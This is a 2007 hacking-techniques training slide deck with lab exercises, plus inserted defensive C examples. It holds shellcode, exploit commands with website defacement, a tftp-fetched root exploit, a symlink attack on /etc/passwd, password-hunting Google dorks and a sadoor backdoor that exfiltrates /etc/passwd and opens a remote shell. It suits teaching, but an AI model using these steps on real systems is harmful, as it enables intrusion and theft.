
Hacking Techniques
Attackers:
- Hackers
- Spies
- Terrorists
- Insiders
- Professional criminals
- Vandals
Objectives:
- Challenge, status
- Political gain
- Financial gain
- Damage
01./02.02.2007 linuxdays.lu 2007 4
Hacking Techniques
- Script kiddies
- Hackers
- Geeks
- Stupid users
- Automated scripts / viruses / botnets / spam
Hacking Techniques
- High-profile targets:
-- Banks
-- Military
-- Universities
-- Telecom / Internet providers
- Private PCs / end users:
-- Botnets
-- Spam
-- Home-banking data
Hacking Techniques
Most frequent security problems:
(Source: CSI/FBI Computer Crime and Security Survey)
- Virus
- Insider
- Laptop theft
- Denial of Service
- Unauthorised
- WLAN
- Hacking
Hacking Techniques
➤Network based System Hacking
➤Web Server Hacking
➤Physically enter the Target Building
➤WLAN (Wireless LAN) Hacking
➤War Dialling
➤Sniffing
➤Social Engineering
➤Viruses
Exercise:
-- physical access = root rights --
1. Interrupt the bootloader by pressing >> e <<
2. Select the kernel line and press >> e <<
3. Add >> init=/bin/bash <<
4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash
5. Press >> Enter <<
6. Press >> b <<
7. mount -o remount,rw /dev/hda4
8. passwd hamm (password: test123)
9. passwd (password: test123)
10. sync
11. mount -o remount,ro /dev/hda4
12. shutdown -rn now
13. Log in as user hamm & launch vmware; start all VMs from top down
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Footprinting
-- Information Gathering --
➤ visit the targets' websites
➤ review HTML code, JavaScript and comments & robots.txt
➤ search for passwords, hidden directories, contact names
➤ Dumpster Diving
Quotation of Bill Gates in: Susan Lammers, Programmers at Work,
Tempus Books; Reissue Edition, 1989:
„No, the best way to prepare is to write programs, and to study great programs that other people have written. In my case, I went to the garbage cans at the Computer Science Centre and I fished out listings of their operating system.“
Footprinting
-- Information Gathering --
➤ whois request at the Network Information Centre
-- receive information about IP address ranges
-- names and e-mail addresses of the responsible persons
whois -h whois.dns.lu linuxdays.lu
domainname: linuxdays.lu
nserver: arthur.tudor.lu
nserver: dorado.tudor.lu
org-name: Centre de Recherche Public Henri Tudor
adm-email: pierre.plumer@crpht.lu
tec-name: Xavier Detro
tec-email: xavier.detro@tudor.lu
Important whois registries:
- RIPE (Europe & N-Africa) - APNIC (Asia Pacific)
- ARIN (N-America & S-Africa) - LACNIC (Latin America)
Footprinting
-- Exercise Information Gathering --
➤ DNS Lookup
-- use nslookup tools to receive information about DNS & e-mail servers; look for names like Oracle, TestLinux, ....
-- try a zone transfer
➤ Footprinting by DNS: nslookup(1); host(1); dig(1);
# nslookup
> server 192.168.22.22
> www.mumm.lu
> set type=mx
> mumm.lu
> set type=any
> mumm.lu
> ls -d mumm.lu # try zone transfer
> exit
# dig @192.168.22.22 mumm.lu axfr # zone transfer
Footprinting
-- Information Gathering --
➤whois tools:
-- Sam Spade www.samspade.org
-- Smart Whois www.tamos.com
-- Netscan www.netscantools.com
-- GTWhois www.geektools.com
-- http://www.all-nettools.com/toolbox
➤DNS must reads:
-- RFC 1912 Common DNS Errors
-- RFC 2182 Secondary DNS Servers
-- RFC 2219 Use of DNS Aliases
Footprinting
-- Information Gathering --
➤ footprinting @ google
➤ news group articles of employees @
➤ search business partners link:
➤ site: intitle:index.of
➤ site: error | warning
➤ site: login | logon
➤ site: username | userid
➤ site: password
➤ site: admin | administrator
➤ site: inurl:backup | inurl:bak
➤ site: intranet
Google Hacking
-- Introduction --
The beginnings:
www.theregister.co.uk/2001/11/28/the_google_attack_engine/
(the link points to a switch of a .gov network)
'Google not hackers' best friend' -- ww.vnunet.com/News/1127162
Index.of +banques +filetype:xls
Johnny (I hack stuff) Long: 'Google Hacking for Penetration Testers'
Google Hacking Database http://johnny.ihackstuff.com
12.03.2006 Chicago Tribune (http://www.heise.de/newsticker/meldung/70752):
2600 CIA agents discovered via search engine
Google Hacking
-- Introduction --
What to know:
Advanced operators: site:, inurl:, filetype:, intitle:, intext:, ……
Google as an 'anonymous proxy': Google Cache, &strip=1
Google Hacking
-- Introduction --
What to know:
The power of combining advanced operators:
site:heise.de -site:www.heise.de
-- shows all websites NOT on the official web server
-- maps new hostnames without contacting the target network
-- wap.heise.de, chat.heise.de, www.tb.heise.de, …
Offline analysis of the search result:
-- www.sensepost.com/research_misc.html
-- SOAP Google API
Google Hacking
-- Introduction --
What to find:
The Google Hacking Database (johnny.ihackstuff.com):
-- Directory listings -> hidden/private files
intitle:index.of 'parent directory'
intitle:index.of.admin
intitle:index.of inurl:admin
intitle:index.of ws_ftp.log
-- Error messages of scripts
'Fatal error: call to undefined function'
-reply -the -next
'Warning: Failed opening' include_path
-- Search for vulnerable scripts
inurl:guestbook/guestbooklist.asp
'Post Date' 'From Country'
-- Search for backups
filetype:bak inurl:php.bak
-- Search for:
--- Printers; --- Webcams; --- Intranet sites;
--- Network tools Ntop, MRTG; --- Databases
Google Hacking
-- Exercise --
Lifecycle of a Google hack:
1. Security problem discovered in an online product
2. Analyse the online product
3. Find a typical string
4. Create a Google query
5. Find vulnerable websites
Examples:
-- inurl:php.bak mysql_connect mysql_select_db
-- ext:pwd inurl:(service | authors | administrators | users)
"# -FrontPage-"
-- "index of/" "ws_ftp.ini" "parent directory"
-- !Host=*.* intext:enc_UserPassword=* ext:pcf
-- "admin account info" filetype:log
-- enable password | secret "current configuration"
-intext:the
Preparation
anonymity doesn’t exist
➤ break systems in different countries / time zones
➤ install network multipurpose tools like netcat or backdoors
➤ hop from host to host to get anonymity
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Scanning
-- Goals --
➤ mapping of the target network
➤ use system tools like traceroute & ping
➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route
➤ finding the range of IP addresses
➤ discerning the subnet mask
➤ identify network devices like firewalls & routers
➤ identify servers
➤ mapping of the reachable services
➤ detecting `live` hosts on target network
➤ discovering services / listening ports / portscan; nmap;
➤ identifying operating system & services
➤ identify application behind services & patch level
Scanning
-- Network Mapping --
Nmap: find live hosts
$ su -
# ns_mumm
# cat /etc/resolv.conf
# nmap -sL www.mumm.lu/27 # List Scan
(only does an nslookup for the IP range)
# nmap --packet_trace -sP www.mumm.lu/27 # ICMP/TCP
(sends ICMP Echo Request and ACK to port 80;
if RST is received -> host is alive / unfiltered)
# nmap -n -P0 -sU -g 53 -p 53 -T polite www.mumm.lu/27
(UDP scans are almost never useful; -g 53 = source port;
-P0 = don't ping scan first; -T polite = scan speed)
-sF, -sX, -sN, -sA # FIN-, XMAS-, Null-, ACK-Scan: not usable today
Scanning
-- Port Scanning --
Nmap: port scan (connect scan)
# nmap -n -sT -P0 -p 80 192.168.22.21,22,24
# nmap -n -sT -P0 -p 110 192.168.22.21,22,24
Port open:   scanner -> SYN, target -> SYN/ACK, scanner -> ACK (full handshake), then RST/ACK to tear down
Port closed: scanner -> SYN, target -> RST/ACK
Scanning
-- Port Scanning --
Nmap: port scan (stealth scan)
# nmap -n -sS -P0 -p 80 192.168.22.21,22,24
# nmap -n -sS -P0 -p 110 192.168.22.21,22,24
Port open:   scanner -> SYN, target -> SYN/ACK, scanner -> RST (handshake never completed)
Port closed: scanner -> SYN, target -> RST/ACK
Scanning
-- Port Scanning --
Nmap: port scan
# nmap -n -sT -P0 -p 20-25,80,443 192.168.22.21,22,24
# nmap -n -sS -P0 -p 20-25,80,443 192.168.22.21,22,24
Techniques to stay anonymous:
silent scan:
# nmap -n -sT -P0 -T sneaky -p 20-25,80 192.168.22.22
fragmentation scan:
# nmap -n -P0 -f -p 20-25,80 192.168.22.22
decoy scan:
# nmap -n -P0 -D 1.1.1.1,2.2.2.2,ME,3.3.3.3 -p 80
Scanning
-- Exercise --
Scan the MUMM.LU network:
Advanced Scanning
-- IP-ID Idle Scan --
Exercise: who the hell is scanning you?
target performs:
# tcpdump -n -i eth0 host 192.168.4.
attacker performs: (idle_scan)
Advanced Scanning
-- IP-ID Idle Scan --
- based on IP-ID prediction
- example with hping2 -SA -p 80 -c 5
- all packets have a fragment ID number (IP ID)
- every new packet increases the IP ID number
- on most systems IP ID + 1
- this is exploitable:
- by monitoring the IP ID value of a host
- you know how many packets it sends
- this can be abused for zombie port scanning
Advanced Scanning
-- IP-ID Idle Scan --
Step 1: A) send SYN/ACK to the Zombie
B) investigate the IPID of the answer
C) repeat A) and B) multiple times, verify the quality of the Zombie
Attacker -> Zombie: IP-ID probe (SYN/ACK); Zombie -> Attacker: RST; IPID=2
Attacker -> Zombie: IP-ID probe (SYN/ACK); Zombie -> Attacker: RST; IPID=3
Attacker -> Zombie: IP-ID probe (SYN/ACK); Zombie -> Attacker: RST; IPID=4
Attacker -> Zombie: IP-ID probe (SYN/ACK); Zombie -> Attacker: RST; IPID=5
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to the target BUT spoof the source IP address, claim to be the Zombie
B) open port: Target sends SYN/ACK to the Zombie
C) open port: Zombie sends RST to the Target and increases its IPID
Attacker -> Target: SYN; Port=80; SRC IP = Zombie
Target -> Zombie: SYN/ACK
Zombie -> Target: RST; IPID=6
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to the target BUT spoof the source IP address, claim to be the Zombie
B) closed port: Target simply sends a RST to the Zombie (the Zombie ignores it, its IPID does not change)
Attacker -> Target: SYN; Port=80; SRC IP = Zombie
Target -> Zombie: RST
Advanced Scanning
-- IP-ID Idle Scan --
Step 3: A) send SYN/ACK to the Zombie
B) investigate the IPID of the answer
If IPID = 6 -> port was closed
If IPID = 7 -> port was open
Attacker -> Zombie: IP-ID probe (SYN/ACK)
Zombie -> Attacker: RST; IPID=7
Advanced Scanning
-- IP-ID Idle Scan --
IP ID Idle Scan with nmap
# nmap -n -P0 -p20-25,80,443 -sI
# nmap -n -P0 -p20-25,80,443 -sI 10.10.10.10 10.10.11.11
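The whole idle scan rests on Step 1: a zombie is only usable if its IP-ID advances predictably between probes. The same measurement, turned around, is a hardening check for your own hosts. The following program is an added example and not code from the talk: it classifies a sequence of IP-ID values (as an observer would read them out of the RST replies; the samples are constructed) as constant, incremental, byte-swapped incremental or random, handling 16-bit wraparound. The threshold IPID_MAX_STEP and the class names are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example (not from the talk): classify the IP-ID values a host returns
 * to repeated probes, i.e. the measurement of Step 1 above. A host whose IDs
 * advance predictably can serve as a "zombie"; running this against your own
 * systems shows which of them need a kernel that randomizes IP-IDs. The ID
 * samples in main() are constructed, as if read from the RST replies. */

enum ipid_class {
    IPID_TOO_FEW,      /* fewer than 3 samples: no verdict */
    IPID_CONSTANT,     /* every reply carries the same ID (e.g. always 0) */
    IPID_INCREMENTAL,  /* small positive steps (+1 on an idle host): predictable */
    IPID_BROKEN_INCR,  /* steps in multiples of 256: byte-swapped counter, predictable too */
    IPID_RANDOM        /* anything else */
};

/* Delta between consecutive 16-bit IDs; unsigned arithmetic handles 0xFFFF -> 0. */
static uint16_t ipid_delta(uint16_t prev, uint16_t next)
{
    return (uint16_t)(next - prev);
}

/* A quiet host steps by exactly 1 per packet; allow a little background
 * traffic between probes, but nothing resembling a random 16-bit value. */
#define IPID_MAX_STEP 16

enum ipid_class classify_ipid(const uint16_t *ids, size_t n)
{
    if (n < 3)
        return IPID_TOO_FEW;
    int constant = 1, incremental = 1, broken = 1;
    for (size_t i = 1; i < n; i++) {
        uint16_t d = ipid_delta(ids[i - 1], ids[i]);
        if (d != 0)
            constant = 0;
        if (d < 1 || d > IPID_MAX_STEP)
            incremental = 0;
        if (d < 256 || d > 256 * IPID_MAX_STEP || d % 256 != 0)
            broken = 0;
    }
    if (constant)    return IPID_CONSTANT;
    if (incremental) return IPID_INCREMENTAL;
    if (broken)      return IPID_BROKEN_INCR;
    return IPID_RANDOM;
}

const char *ipid_class_name(enum ipid_class c)
{
    switch (c) {
    case IPID_TOO_FEW:     return "too few samples";
    case IPID_CONSTANT:    return "constant (not usable as zombie)";
    case IPID_INCREMENTAL: return "incremental (predictable, usable as zombie)";
    case IPID_BROKEN_INCR: return "broken little-endian incremental (predictable)";
    default:               return "random (not usable as zombie)";
    }
}

int main(void)
{
    /* constructed samples */
    const uint16_t idle_host[]    = { 2, 3, 4, 5 };                   /* the slide's zombie */
    const uint16_t wrapping[]     = { 0xFFFE, 0xFFFF, 0x0000, 0x0001 };
    const uint16_t byte_swapped[] = { 0x0100, 0x0200, 0x0300, 0x0400 };
    const uint16_t zeros[]        = { 0, 0, 0, 0 };
    const uint16_t randomized[]   = { 0x1a2b, 0x9f03, 0x0c44, 0x7731 };

    printf("idle host:    %s\n", ipid_class_name(classify_ipid(idle_host, 4)));
    printf("wrapping:     %s\n", ipid_class_name(classify_ipid(wrapping, 4)));
    printf("byte-swapped: %s\n", ipid_class_name(classify_ipid(byte_swapped, 4)));
    printf("zeros:        %s\n", ipid_class_name(classify_ipid(zeros, 4)));
    printf("randomized:   %s\n", ipid_class_name(classify_ipid(randomized, 4)));
    return 0;
}
```

A host that comes out as incremental or broken-incremental is the kind of zombie Step 1 looks for; modern kernels return either constant or randomized IDs, which is what the check should report for every machine on your network.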
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
- What services are bound to the port:
-- identifying service / protocol;
-- identifying server software;
-- identifying version number;
-- identifying additional modules etc.
Automatic approach:
# nmap -n -p 20-25,80,443 -sV 192.168.22.22,25
# nmap -n -p 20-25,80,443 -oM scan1 192.168.22.22,25
# amap -B -i scan1
# amap -i scan1
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
Manual approach with Netcat:
# nc 192.168.22.22 22
# nc 192.168.22.22 80
HEAD / HTTP/1.0
# nc 192.168.22.21 21
# nc 192.168.22.21 80
HEAD / HTTP/1.0
OS Detection:
# nmap -O 192.168.22.22,25
# xprobe2 192.168.22.22
# xprobe2 -p tcp:443:open 192.168.22.22
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Gaining Access
-- Where are we now --
At this point we know (without doing anything illegal at all):
-- the target's business (products, partners, employees)
-- an overview of the network topology
-- an overview of live servers and open ports
-- services in use, server software, version numbers
How to proceed:
-- is there a known vulnerability?
-- do we know a vulnerability?
-- known configuration problems
-- default passwords
Prepare the attack:
-- research on the internet for known security holes
-- default passwords; common misconfigurations
-- set up a test environment to practice the attack
-- ideal: fire one single attack
Gaining Access
-- prepare attack --
Gaining Access
-- Buffer Overflow --
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
Gaining Access
-- Stack Based Buffer Overflow --
➤ C/C++ problem
➤ programming error
➤ copying too much user input into a fixed-size buffer
#include <stdio.h>
int main()
{
char name[31];
printf("Please type your name: ");
gets(name);   /* reads without any bound: input longer than 30 characters overflows name */
printf("Hello, %s", name);
return 0;
}
A buffer overflow occurs if you enter
`1234567890123456789012345678901234567890`
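The fix for the program above is not a bigger buffer but a read that can never exceed the buffer. The following is an added example, not code from the talk: the same 31-byte name buffer, read with a bounded fgets() that reports truncation and drains the rest of an over-long line, plus a bounded copy helper for the strcpy() cases on the following slides. The helper names copy_bounded and read_name are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example: the slide's gets()/printf program with the unbounded read
 * replaced by a bounded one. Not code from the original talk. */

#define NAME_LEN 31   /* same buffer size as the slide: 30 characters + NUL */

/* Copy src into dst, never writing past dstsz bytes and always NUL-terminating.
 * Returns 0 on a complete copy, 1 if src had to be truncated, -1 on bad arguments. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;
    size_t n = strlen(src);
    if (n < dstsz) {
        memcpy(dst, src, n + 1);   /* fits, including the terminator */
        return 0;
    }
    memcpy(dst, src, dstsz - 1);   /* keep what fits ... */
    dst[dstsz - 1] = '\0';         /* ... and terminate explicitly */
    return 1;
}

/* Read one line into name (at most sz bytes) where the slide used gets():
 * fgets() stops after sz-1 characters, so the stack buffer cannot overflow.
 * Leftover input on an over-long line is drained so it does not leak into the
 * next read. Returns 0 when the whole line fitted, 1 when it was cut, -1 on EOF/error. */
int read_name(FILE *in, char *name, size_t sz)
{
    if (fgets(name, (int)sz, in) == NULL)
        return -1;
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';      /* complete line: drop the newline */
        return 0;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 0;                  /* buffer was exactly filled, nothing lost */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                          /* discard the part that did not fit */
    return 1;
}

int main(void)
{
    char name[NAME_LEN];
    printf("Please type your name: ");
    int rc = read_name(stdin, name, sizeof name);
    if (rc < 0)
        return 1;
    printf("Hello, %s%s\n", name, rc ? " (input truncated)" : "");
    return 0;
}
```

Feeding the slide's 40-digit string to this version yields a 30-character name and a truncation flag instead of an overwritten return address; the same pattern (size passed alongside the pointer, explicit termination, truncation reported rather than ignored) is what replaces strcpy() in the function() example on the next slides.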
Gaining Access
-- Stack Based Buffer Overflow --
Exploitation:
-- Missing bounds checking
-- Multiple „unsafe“ functions in libc
-- Executing code in the data/stack segment
-- Crafting the input to be fed to the application
Memory layout of a process (low address at the top, high address at the bottom):
- Code ('read-only' attribute)
- Data
- BSS
- Heap
- Stack (LIFO, top of the stack)
No 'execution' attribute is set on the data and stack segments, so code placed there can run.
Gaining Access
-- Stack Based Buffer Overflow --
-- the stack frame holds all the information for the function
-- a stack frame is created at the beginning of a function
-- the stack frame is released at the end of a function
-- LIFO mechanism to pass arguments to functions and to reference local variables
void
function (char *args)
{
[ ... ]
}
int
main (int argc, char *argv[])
{
int a;
function (argv[1]);
[ ... ]
}
[Figure: the stack with Frame 1 (main) and Frame 2 (function); EBP marks the base of the current frame and ESP its top; PUSH adds to and POP removes from the top. Each frame holds: function parameters, local variables, data to recover the previous frame.]
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
Gaining Access
-- Stack Based Buffer Overflow --
#include <stdio.h>
#include <string.h>
void
function (char *args)
{
char buff[512];
strcpy (buff, args);   /* no bounds check: args longer than 512 bytes runs over SFP and return address */
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
[Figure: the stack after the call to function(). Frame 1 belongs to main(), Frame 2 to function(). Pushed in order (steps 1-4), from high to low address: args, Return Address (saved EIP), SFP (saved EBP), saved registers, then the local variables including buff[512]. EBP points at the SFP of the current frame, ESP at its top.]
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
Gaining Access
-- Stack Based Buffer Overflow --
(same program as on the previous slide)
[Figure: step 5: strcpy() writes past the end of buff[512]; the overflow runs over the local variables, saved registers and SFP and replaces the Return Address of function() with bytes from the input ("Wrong Return").]
Gaining Access
-- Stack Based Buffer Overflow --
(same program as above)
[Figure: steps 4 to 6: when function() returns, the overwritten Return Address ("Wrong Return") is popped into EIP, so execution continues at an address chosen by the input instead of returning into main().]
Gaining Access
-- Stack Based Buffer Overflow --
(same program as above)
[Figure: the classic payload laid out in buff[512], example addresses 0x0800 to 0x0C00: a run of nop instructions, the shellcode around 0x0A00, and the Return Address overwritten with 0x0A00 repeated, so that the wrong return lands in the nop run and slides into the shellcode.]
Gaining Access
-- Shellcode --
char linux_ia32_shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cltd */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
Old school payloads: bindshell, backconnect
Gaining Access
-- Exercise: Web Site defacement --
$ cd /home/hamm/ssl/
$ ls -la
$ ./openSSL 0x73 192.168.22.21 443 -c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html
- unprivileged user -> local privilege escalation
Gaining Access
-- Exercise: Web Site defacement --
What do we see on the firewall???
Gaining Access
primary target: web server
-- why they are so vulnerable --
➤ complex application
➤ multiple subsystems: application server, scripts, SQL server
➤ self-made applications: programmers don't know how to write secure code
➤ Shell command injection: pass additional commands to the shell via user input
Input: "Alice; rm -rf"
➤ SQL injection: pass additional SQL commands via user input
Input: "User=Alice' -&Pass=Idontknow"
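The command-injection input on this slide only works because the application hands a string containing the user name to a shell. The following is an added example and not code from the talk: a hypothetical lookup handler shown in its vulnerable form (string pasted into system()) beside a hardened form that allow-lists the user name and executes the program directly via fork()/execv() with an argv array, so no shell ever interprets the input. The command run is /bin/echo as a stand-in for whatever the real application would call; valid_username, lookup_unsafe and lookup_safe are this example's own names.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example, not from the talk: a lookup handler that takes a user name
 * from a web form. /bin/echo stands in for the real program (finger, a report
 * generator, ...) so the example runs anywhere. */

/* Allow-list check: 1-32 characters of [A-Za-z0-9._-], not starting with '-'
 * (so the name can never be parsed as an option by the program we exec). */
int valid_username(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 32 || s[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Vulnerable form (the pattern the slide describes): the name is pasted into a
 * shell command line, so "Alice; rm -rf" makes the shell run a second command.
 * Kept only for comparison; nothing in this example calls it. */
int lookup_unsafe(const char *user)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "/bin/echo lookup %s", user);
    return system(cmd);
}

/* Hardened form: reject anything outside the allow-list, then exec the program
 * directly with an argv array. No shell is involved, so shell metacharacters in
 * the name carry no meaning even if the check were ever bypassed.
 * Returns the child's exit status, or -1 on rejection or failure. */
int lookup_safe(const char *user)
{
    if (!valid_username(user))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/echo", "lookup", (char *)user, NULL };
        execv(argv[0], argv);
        _exit(127);                    /* only reached if execv failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    /* constructed sample: the slide's injection string unless one is given */
    const char *user = argc > 1 ? argv[1] : "Alice; rm -rf";
    int rc = lookup_safe(user);
    printf("lookup_safe(\"%s\") -> %d\n", user, rc);
    return rc < 0 ? 1 : 0;
}
```

The same separation of data from command is the answer to the SQL example on this slide: the user name and password go in as bound parameters of a prepared statement, never concatenated into the query text.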
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Maintaining Access
-- be silent --
➤after a successful initial attack
➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network
Maintaining Access
Privilege Escalation
-- Race Condition --
What could I try to attack?
- SUID / SGID binaries
find / -perm -4000 -type f -user root -print
find / -perm -2000 -type f -group root -print
- privileged processes
- kernel
- password file
Source of problems?
- configuration errors
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string
Maintaining Access
Privilege Escalation
-- example: race_bug --
#include <stdio.h>
#include <unistd.h>
int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt";
FILE *fp;
if (argc < 2)
return 1;
fp = fopen (path, "a+");   /* fixed, predictable name; fopen() follows a symlink planted here */
if (fp == NULL)
return 1;
fprintf (fp, "%s\n", argv[1]);
fclose (fp);
unlink (path);
return 0;
}
Maintaining Access
Privilege Escalation
-- example: race_bug --
Prepare attack
$ cd /home/hamm/race
$ ls -la
$ ./race_bug test
$ ls -la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit
Attack:
$ ln -s /etc/passwd /tmp/race.txt
$ ls -la /tmp
$ cat command
$ ./command
$ ls -la /tmp
$ cat /etc/passwd
$ su - bimbam
# id
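The race_bug program and the attack steps above both hinge on one line: fopen() on a fixed name in a world-writable directory follows whatever symlink is waiting there. The following is an added example, not code from the talk, covering both slides: an append function that opens with O_NOFOLLOW, then checks the opened descriptor (not the name) for a regular file owned by the caller with a single hard link, so a planted symlink or hard link is rejected before anything is written. The function name append_line_nofollow is this example's own; the paths in main() follow the slide's.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Added example, not from the talk: the race_bug program appends to a fixed,
 * predictable path in /tmp with fopen(), which follows a symlink an attacker
 * planted there first. This function appends the same way but refuses to be
 * redirected. */

/* Append one line to path. Returns 0 on success, -1 on error (errno set).
 * Hardening versus fopen(path, "a+"):
 *  - O_NOFOLLOW: open() fails with ELOOP if the last path component is a symlink;
 *  - fstat() the descriptor, not the name, and require a regular file owned by
 *    the caller with exactly one hard link, so a pre-placed file or hard link
 *    to another inode (e.g. the password file) is rejected as well;
 *  - the file is created 0600, never world-writable. */
int append_line_nofollow(const char *path, const char *line)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                       /* ELOOP when a symlink sits at path */

    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }

    size_t n = strlen(line);
    ssize_t w1 = write(fd, line, n);
    ssize_t w2 = write(fd, "\n", 1);
    int rc = (w1 == (ssize_t)n && w2 == 1) ? 0 : -1;
    if (close(fd) < 0)
        rc = -1;
    return rc;
}

int main(int argc, char *argv[])
{
    /* Better still for scratch files: a per-process name from mkstemp() instead
     * of a fixed, guessable path. The slide's fixed name is kept here to show
     * the effect of the checks on exactly that case. */
    const char *path = "/tmp/race.txt";
    const char *text = argc > 1 ? argv[1] : "test";
    if (append_line_nofollow(path, text) < 0) {
        perror("append_line_nofollow");
        return 1;
    }
    unlink(path);
    return 0;
}
```

With `ln -s /etc/passwd /tmp/race.txt` in place, the hardened version fails with "Too many levels of symbolic links" and writes nothing; with no link present it behaves exactly like race_bug.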
Maintaining Access
Privilege Escalation
-- Exercise: privilege escalation --
$ su -
# cd /home/hamm/ssl/
# ls -la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0x73 192.168.22.21 443 -c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls -l
chmod +x p
ls -l
./p
whoami
Maintaining Access
Port Knocking
-- introduction --
Aka Port Knocking Back Door
- Open port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated
- attacker:
-- send trigger pkt 1
-- send trigger pkt 2
-- send trigger pkt 3
-- send command pkt 1
- example: Sadoor
http://cmn.listptojects.darklab.org
Ports 80, 443 open; stateful
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}
# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}
# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
dport = 80;
sport = 12345;
}
}
}
Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database and download it to /home/hamm/.sash
mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db
Run the daemon
/usr/sbin/sadoor
Review logging
tail -f /etc/sadoor/sadoor.log
Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm -f sadoor.db # delete plain sequence
3. Sending commands
sash 192.168.22.24 \
-vv -r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"
4. Establish a connection / remote shell
sash 192.168.22.24 -vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:
- hide the attacker's activities from the legitimate administrator
-- active processes
-- directories & files
-- network activities
- provide a backdoor to the system
- let the attacker become root whenever he wants
- collect sensitive data
-- from the network
-- from user input
Clearing Tracks
Rootkits
-- introduction --
1st generation: Binary Rootkits
- replace important system tools by modified versions:
-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …..
- defined parameters become invisible from then on:
-- IP addresses
-- directories & files
-- usernames
- easy to discover:
-- by filesystem integrity checkers: tripwire, aide
- examples: lrk3-6 (Linux), Fbrk (FreeBSD), Solaris Rootkit
